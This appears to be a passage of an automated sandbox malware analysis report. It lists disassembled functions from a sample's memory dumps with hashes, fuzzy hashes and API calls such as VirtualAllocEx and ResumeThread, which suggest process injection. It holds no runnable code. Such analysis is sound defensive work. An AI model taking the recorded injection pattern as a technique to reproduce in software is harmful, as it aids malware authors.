            • API String ID: 3793708945-0
            • Opcode ID: 27325aac6f0521c62e44d1154e241df30e4b1844225729456249dc2747b003e6
            • Instruction ID: a19b3962b7145651d1dbcace961608eb933210cc98de304430d7f48b724e8324
            • Opcode Fuzzy Hash: 27325aac6f0521c62e44d1154e241df30e4b1844225729456249dc2747b003e6
            • Instruction Fuzzy Hash: 4421E3B5900249DFDB10CFA9D984ADEBBF4FB48324F14841AE914A3210D378A954CF60
            Function 00FAA188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAB079,00000800,00000000,00000000), ref: 00FAB68A
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 93ce4cf6e48e64f7c4795649d4fe85b650486af0a043fe15a08eee0112c7aa27
            • Instruction ID: c627a3513cdcf183b23a5fde3ef61d89e112566d62c0645ed0ae3490bf9cb9fd
            • Opcode Fuzzy Hash: 93ce4cf6e48e64f7c4795649d4fe85b650486af0a043fe15a08eee0112c7aa27
            • Instruction Fuzzy Hash: 691100B6C003099FDB10CF9AC844B9EFBF4EB89320F14846AE519A7301C3B5A944CFA4
            Function 07393B30 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07393BA6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: ff214720d620c215f0b0bd28598c3ea4ce974a3d4e8d3eaf572e14001cbe12c8
            • Instruction ID: 34be4bb6b3d7c5b343fe15d51734b0c0d0fdd8d422d584d85c4d183984222e35
            • Opcode Fuzzy Hash: ff214720d620c215f0b0bd28598c3ea4ce974a3d4e8d3eaf572e14001cbe12c8
            • Instruction Fuzzy Hash: F5114A728003499FDF10DFAAC844BDEBFF5EF88310F148419E519A7250C7759950CB91
            Function 07393B38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07393BA6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 8ca7cc218333c1980c5ddc5a51f3e5d01ce9f7a0bbe01a1a914c66c6c3dafe23
            • Instruction ID: c33dc6ea7fd142195fc273064ac5e66926a354f4710347482baa40de729e38c7
            • Opcode Fuzzy Hash: 8ca7cc218333c1980c5ddc5a51f3e5d01ce9f7a0bbe01a1a914c66c6c3dafe23
            • Instruction Fuzzy Hash: DC1129B69003499FDF10DFAAC845BDEBFF5EF88320F148419E519A7250C7759950CBA1
            Function 073939A9 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: bd9d1d4eed58a0186277da070d58089841f46f0a806c2fc1e8ee7cfd82190eb2
            • Instruction ID: da9cf72f07826a61c749e66b5da23f2e9833795e1004326dc332f3aba9e5a7bb
            • Opcode Fuzzy Hash: bd9d1d4eed58a0186277da070d58089841f46f0a806c2fc1e8ee7cfd82190eb2
            • Instruction Fuzzy Hash: 2D115BB19003499FDB10DFAAC8457DFFBF5EF88324F248419D519A7240CB756944CBA5
            Function 00FAB619 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAB079,00000800,00000000,00000000), ref: 00FAB68A
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 06a4e0f014eab65d6d6012c2113308e6940da2f6c5cb96d983bdd085ef598f72
            • Instruction ID: 4a5edee9c7510f0f8e2de477dd3f43a3b942656c8acfba3e89dfd6e2391de9d0
            • Opcode Fuzzy Hash: 06a4e0f014eab65d6d6012c2113308e6940da2f6c5cb96d983bdd085ef598f72
            • Instruction Fuzzy Hash: 591112B6C003498FDB10CFAAC444BEEFBF4AB48320F14856ED519A7200C3B9A945CFA4
            Function 07398298 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 073982FD
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: ace7a56f4ea4b7c4e8cf6e310f0802dc0bf928357c237cf9a97c31786829cbfe
            • Instruction ID: fc756884f1c2194135bb58caf071580f7a2afde13ef939d09ec92a2a123e5520
            • Opcode Fuzzy Hash: ace7a56f4ea4b7c4e8cf6e310f0802dc0bf928357c237cf9a97c31786829cbfe
            • Instruction Fuzzy Hash: 8611E3B58003499FDB10DF9AD985BDEBBF8EB48324F20841AE558A3200C379A544CFA5
            Function 073939B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 57ae8c5e5957a752e15e77adf7e88953245dd5bba0ac87397f16031e8374b422
            • Instruction ID: dc76f5c5e88ace461ab35229c6ed52432d3daea42d39e929ed5421be9b9b1d03
            • Opcode Fuzzy Hash: 57ae8c5e5957a752e15e77adf7e88953245dd5bba0ac87397f16031e8374b422
            • Instruction Fuzzy Hash: 4B1128B19003498FEB10DFAAC44579FFBF4EF88624F248419D519A7240CB75A940CBA5
            Function 00FAAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAFFE
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: c053d3227fe390ce725c42c60d359af03d0003fbaa176e9109aa6ed995b542b9
            • Instruction ID: 267b44423fab6141e16a211921f587fdd7589e3e7ea134166c1dd965125cceaa
            • Opcode Fuzzy Hash: c053d3227fe390ce725c42c60d359af03d0003fbaa176e9109aa6ed995b542b9
            • Instruction Fuzzy Hash: FA110FB6C003498FDB20CF9AD444B9EFBF4AF88324F10841AD529A7210D3B9A545CFA1
            Function 07397B2C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 073982FD
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 61518c0c7c61cfec09a62e33adb278ac0cfedbafedd3d34784dea0037d4b2452
            • Instruction ID: db5e0bda8c22a2d97fc78e8913fa2bb018483ac0506171ed4aa6f3370c1196d2
            • Opcode Fuzzy Hash: 61518c0c7c61cfec09a62e33adb278ac0cfedbafedd3d34784dea0037d4b2452
            • Instruction Fuzzy Hash: D11125B5800349DFDB10CF9AC844BDEFBF8EB48320F108419E558A3240C3B5A944CFA0
            Function 00FAB6C1 Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAB079,00000800,00000000,00000000), ref: 00FAB68A
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: bb6923781d853b296e1ba5927bf7a230ababe43e714579e85f884f840d716419
            • Instruction ID: 85307f930221ccce05cfcb15273a470fab7b49d7e5628b19c7328aba4526bfd3
            • Opcode Fuzzy Hash: bb6923781d853b296e1ba5927bf7a230ababe43e714579e85f884f840d716419
            • Instruction Fuzzy Hash: 2701F7B29043449FDB108FA9D8047DAFBF4EF56324F04809AE104D7252C3B99851CFA5
            Function 0523CDF8 Relevance: .6, Instructions: 551COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9339c21a8c52baaf15e1af1c2ab5db617596cfd50ae14272ed9e997cf16fc9ec
            • Instruction ID: 08779cef723fc99c2cb9b3fb9f0e4c4ae733d9ebbd47f7e7a39b49c94ecea54f
            • Opcode Fuzzy Hash: 9339c21a8c52baaf15e1af1c2ab5db617596cfd50ae14272ed9e997cf16fc9ec
            • Instruction Fuzzy Hash: 9F42E971E1071ACBCB14DF68C8856EDB7B1BF89304F118699D459BB261EB70AE85CF40
            Function 0523CDE8 Relevance: .3, Instructions: 332COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a6b8fc5229361e11769e9829b962cf8f2e19a0a4544725df26dff93e024f42e3
            • Instruction ID: 862d6aa9128af7b3758d2059af119ec7b689b58724b3a68c0751a8e4a676e3a8
            • Opcode Fuzzy Hash: a6b8fc5229361e11769e9829b962cf8f2e19a0a4544725df26dff93e024f42e3
            • Instruction Fuzzy Hash: 5AE1FB71E20619CFCB24DF68C885AEDB7B2BF49340F1186A9D459BB251EB30AD85CF40
            Function 052391CC Relevance: .3, Instructions: 289COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e160063e51cf32fcddb626cb8b5ab99e49bdea0d9f97a16950be6113fa772de8
            • Instruction ID: cbedad69842d1b6e5872bb15898ee29881f9c53217dcd4e5e09821eba3013411
            • Opcode Fuzzy Hash: e160063e51cf32fcddb626cb8b5ab99e49bdea0d9f97a16950be6113fa772de8
            • Instruction Fuzzy Hash: 4391E3B1A11308DFCB14DFA9D889AAEBFF6FF85310F10846AE445A7351DB349856CB90
            Function 052394A0 Relevance: .2, Instructions: 211COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09b6b482ba0ed2bf9e13a8a161babbf2f465106f637a1d6cd50b19bfbf8b46f5
            • Instruction ID: ef996745304b7c8ffbee863bdeb4f4234382ae5971789d1ba7ef29ab64b27c45
            • Opcode Fuzzy Hash: 09b6b482ba0ed2bf9e13a8a161babbf2f465106f637a1d6cd50b19bfbf8b46f5
            • Instruction Fuzzy Hash: DA817DB0E103198FDB04DFA9C8956AEBBF6FF89300F14852AE409EB351DB749941CB91
            Function 05231230 Relevance: .2, Instructions: 200COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 63f16a0ff853c2effbe9f09ddbfcfb59e4f4b5d36afb2d72e2e87f9a91b185d7
            • Instruction ID: bdbf63570a8c855f5cdeba1692ef9951a46165b42823ee65548ced08a22cb3c4
            • Opcode Fuzzy Hash: 63f16a0ff853c2effbe9f09ddbfcfb59e4f4b5d36afb2d72e2e87f9a91b185d7
            • Instruction Fuzzy Hash: 5F719A31A106058FCB08EF78C89455ABBA2FFC93107508669D90AAB365EF70ED46CB90
            Function 0523F820 Relevance: .2, Instructions: 197COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9e58a33f6ebef8cda274b0cffd2791d1b772d88506da0a2f462ca37792258d9f
            • Instruction ID: ea4dce113e098e75b0c7400f07d29cf2ec3780748ac5877052379daa67e6a637
            • Opcode Fuzzy Hash: 9e58a33f6ebef8cda274b0cffd2791d1b772d88506da0a2f462ca37792258d9f
            • Instruction Fuzzy Hash: 9291F77191070ADFCB01DF68D880999FBF5FF89310B14879AE819EB255EB70E985CB80
            Function 0523EBB0 Relevance: .2, Instructions: 176COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ed38a7e37ca3be3b2f7bc1394b682b3a63820c6dc9ce2f69b8627a95ad8845af
            • Instruction ID: fb1dac35b4635ab4e5d84530aa99976a686f30de4811a102084af496567aa1fc
            • Opcode Fuzzy Hash: ed38a7e37ca3be3b2f7bc1394b682b3a63820c6dc9ce2f69b8627a95ad8845af
            • Instruction Fuzzy Hash: 2071AAB9700A00CFC718DF29C498959BBF2BF89714B1589A9E54ACB372DB72EC45CB50
            Function 052304E8 Relevance: .2, Instructions: 175COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 17c369dfd2b409904a3a0eafd84163c52d49150c29d2b7b3329054463589a68e
            • Instruction ID: bddaeec345fe2eea88224deae130d745d6b4fd27e5dc3a7553c6b4691921f296
            • Opcode Fuzzy Hash: 17c369dfd2b409904a3a0eafd84163c52d49150c29d2b7b3329054463589a68e
            • Instruction Fuzzy Hash: 8651F670A1020ACFDB14EFA9D8596AEBBB2EFC4300F14852DD406A7345DF789D45DB91
            Function 0523EBA0 Relevance: .2, Instructions: 174COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12a4f564264ef2acc4548d9faec3e92302575ad79065af4382545f05daadcfa5
            • Instruction ID: ebbb08b4b08c3651fa590e9b9a36673af3427ea455168617e1aa3d89cc02fb89
            • Opcode Fuzzy Hash: 12a4f564264ef2acc4548d9faec3e92302575ad79065af4382545f05daadcfa5
            • Instruction Fuzzy Hash: FD71DDB9600A008FC718DF29C498A59BBF2FF89314B1589A9E54ACB372DB71EC45CB50
            Function 0523E9C0 Relevance: .2, Instructions: 172COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c767296c5aa8844557a193634f6fe915745d96011edca2a6608e7a1aaeb010ed
            • Instruction ID: 4f913f8e64ebcb6541b7b1c673a0be7ac653da54d9f7a0c6212a9e1faf3942fe
            • Opcode Fuzzy Hash: c767296c5aa8844557a193634f6fe915745d96011edca2a6608e7a1aaeb010ed
            • Instruction Fuzzy Hash: EE71A4B4A142068FC704CF69D585999FBF6BF48314B1986A9E80ADB312D734EC85CF90
            Function 05231AD2 Relevance: .2, Instructions: 172COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b0fcc4db5bd1d4f1f4b634180f9103b337d3d87232fb2bd5001575353c85c95c
            • Instruction ID: 9b5f711f616cbea5e5562793933a6ee51b604624f5e0497026aa43c1f821b88c
            • Opcode Fuzzy Hash: b0fcc4db5bd1d4f1f4b634180f9103b337d3d87232fb2bd5001575353c85c95c
            • Instruction Fuzzy Hash: 8C71BE74A11209EFCB15DF69D889DAEBBB2FF89310B114498F905AB361DB31EC91CB50
            Function 05238844 Relevance: .2, Instructions: 156COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 665dfbbadffea0ae619d80bf5d3a92010f25ebc02c53c5aef09fe4e38fd4dc75
            • Instruction ID: 77bd7bb567faf2a72ff8b5dcba22a7c38f5ba09116e6537cecbd585e1758e1ce
            • Opcode Fuzzy Hash: 665dfbbadffea0ae619d80bf5d3a92010f25ebc02c53c5aef09fe4e38fd4dc75
            • Instruction Fuzzy Hash: DD5151B1E102099FDB14DFA9C849AAFBBFAEFC8310F10842AE515E7350DB749905CB90
            Function 05234298 Relevance: .1, Instructions: 146COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4a2c8f7005ceb9d9cb71e6395864f7e160ef65cc248b84caeaa34e5c8e485d1c
            • Instruction ID: 127eeb7a14c63a70ab6e1f8946016f64d296e6a1940bfc6ede7098b37782b53d
            • Opcode Fuzzy Hash: 4a2c8f7005ceb9d9cb71e6395864f7e160ef65cc248b84caeaa34e5c8e485d1c
            • Instruction Fuzzy Hash: 2F51BE75A042058FCB18EF78D45456EBBB2FF853047208A6ED40AAB395EB30AD42CBD1
            Function 0523F810 Relevance: .1, Instructions: 146COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ba1fa5b101c4d27651b98e2dbfbc54451293d110cf9be2ddfc0e75d7943555da
            • Instruction ID: 45856afd57df3cc2f955976ef2967ef0d09392d27157b393f8e962ddc7da2f59
            • Opcode Fuzzy Hash: ba1fa5b101c4d27651b98e2dbfbc54451293d110cf9be2ddfc0e75d7943555da
            • Instruction Fuzzy Hash: 9051F671D1070ACFCB41EF68C881A99FBB5FF49310B14875AE859EB255EB70E985CB80
            Function 05233B72 Relevance: .1, Instructions: 146COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fe5dcacc484c5ea46870bc7cde34e5cbb8409826afdb8a65e98a38ff80be4878
            • Instruction ID: f3cc144ad31637daf2eb2058fc40a71f7945382a8a2e3676d39860ca9b6f2573
            • Opcode Fuzzy Hash: fe5dcacc484c5ea46870bc7cde34e5cbb8409826afdb8a65e98a38ff80be4878
            • Instruction Fuzzy Hash: 2651E634A20609CFCB04EF68C89899DBBB6FF89704F1585A9E5069B371EB71ED45CB40
            Function 05232690 Relevance: .1, Instructions: 145COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d08f2d4712b343e4f995515b27f094e1194743bfc753b8051bc4ccfc902816f
            • Instruction ID: 5d5a4162573b85ff9d1d77f33077647b53c87031c82bc237150626bc0d1df5a4
            • Opcode Fuzzy Hash: 4d08f2d4712b343e4f995515b27f094e1194743bfc753b8051bc4ccfc902816f
            • Instruction Fuzzy Hash: 88519B78B24209DFCB14DB79D859BADBBF2BF49211F1440A9E80AE7291CF749C40CB60
            Function 05233B80 Relevance: .1, Instructions: 143COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bfe361e2d35ac7219de34ecbd22102861c291fd0e14ab50934592c61d7f328d3
            • Instruction ID: 0b4dcd08ac17936260f65a34a683f2643d08c9ff4effedbaa0cdd0b9cdee92ad
            • Opcode Fuzzy Hash: bfe361e2d35ac7219de34ecbd22102861c291fd0e14ab50934592c61d7f328d3
            • Instruction Fuzzy Hash: 9C51E634B20609CFCB04EF68C89899DB7B6FF89700B1585A9E5069B371EB71ED45CB40
            Function 05230006 Relevance: .1, Instructions: 127COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 60ba9a1c972dce54fafe932a49896ffa07d8143c42b7c065d97c152af755f320
            • Instruction ID: 5cfe7794cbe8ebb1dbbea81ca468f76a8cf9b366ed5044802674f00c389acf64
            • Opcode Fuzzy Hash: 60ba9a1c972dce54fafe932a49896ffa07d8143c42b7c065d97c152af755f320
            • Instruction Fuzzy Hash: 34519230600244CFDB15DF68D995A8DBBF2EF49304F1484ADE446AB362DBB9AC44CFA0
            Function 05231F28 Relevance: .1, Instructions: 127COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b605aa1c0ef979a7bd65cd8264f6f4fe84e4f5dc060068678e44c8f1e008748b
            • Instruction ID: 64da59d1160f1e155b9386b23091c913a0ba0f154938c5a05d3fece55547aa98
            • Opcode Fuzzy Hash: b605aa1c0ef979a7bd65cd8264f6f4fe84e4f5dc060068678e44c8f1e008748b
            • Instruction Fuzzy Hash: C0418974B242598FCB14DB69C885EADBBF6BF49704F1440A9E506EB3A2CB75DC04CB50
            Function 05235718 Relevance: .1, Instructions: 124COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 82a90e2b39f3d26c1ceb00438b2395f5c8c7507f351d682f76a52c43d995672d
            • Instruction ID: ac13b4e97197e5a655ba5a3fe2ddde0359b848bd6f6c62cdff80d9be822ccd41
            • Opcode Fuzzy Hash: 82a90e2b39f3d26c1ceb00438b2395f5c8c7507f351d682f76a52c43d995672d
            • Instruction Fuzzy Hash: A5416CB5B21216CBCB15DF79E845AADBBF2BF48311F144125D409B7340DB709982CBA1
            Function 05230B40 Relevance: .1, Instructions: 123COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1897d18c5aec6f2a267998d1b0b3b81bad86dd243af28695f70d66b89e1cf755
            • Instruction ID: de7aa72fc6ae3671f2b3e42b436fd6bb69dd160777d011b617d9df982b0602cd
            • Opcode Fuzzy Hash: 1897d18c5aec6f2a267998d1b0b3b81bad86dd243af28695f70d66b89e1cf755
            • Instruction Fuzzy Hash: D451F775A11209AFDB10DF94D599FAEBBF2FF48310F208469E905A73A1CB71AD41CB60
            Function 052302C0 Relevance: .1, Instructions: 118COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b1f1f1e6e6fe9b57bde3d6ea92703edc7cdc285a489c4cc8fd739eb66ce72538
            • Instruction ID: 43ef207ef4786da401c78496e8cacb58d32e52e8da3696ec793441351d32eb0b
            • Opcode Fuzzy Hash: b1f1f1e6e6fe9b57bde3d6ea92703edc7cdc285a489c4cc8fd739eb66ce72538
            • Instruction Fuzzy Hash: 59410974B102198FCB44DFA8C889BDDB7B1BF49704F104069EA05AB3A2DB78EC01CB60
            Function 05230040 Relevance: .1, Instructions: 114COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fe030d8d3a81c809c469c413bf799d7e125191760bbe2743fbb77612056dc9b
            • Instruction ID: 584b24604780bab35a099d329ca36bbfe9dc17ab295adaff3395cf0b37961b01
            • Opcode Fuzzy Hash: 3fe030d8d3a81c809c469c413bf799d7e125191760bbe2743fbb77612056dc9b
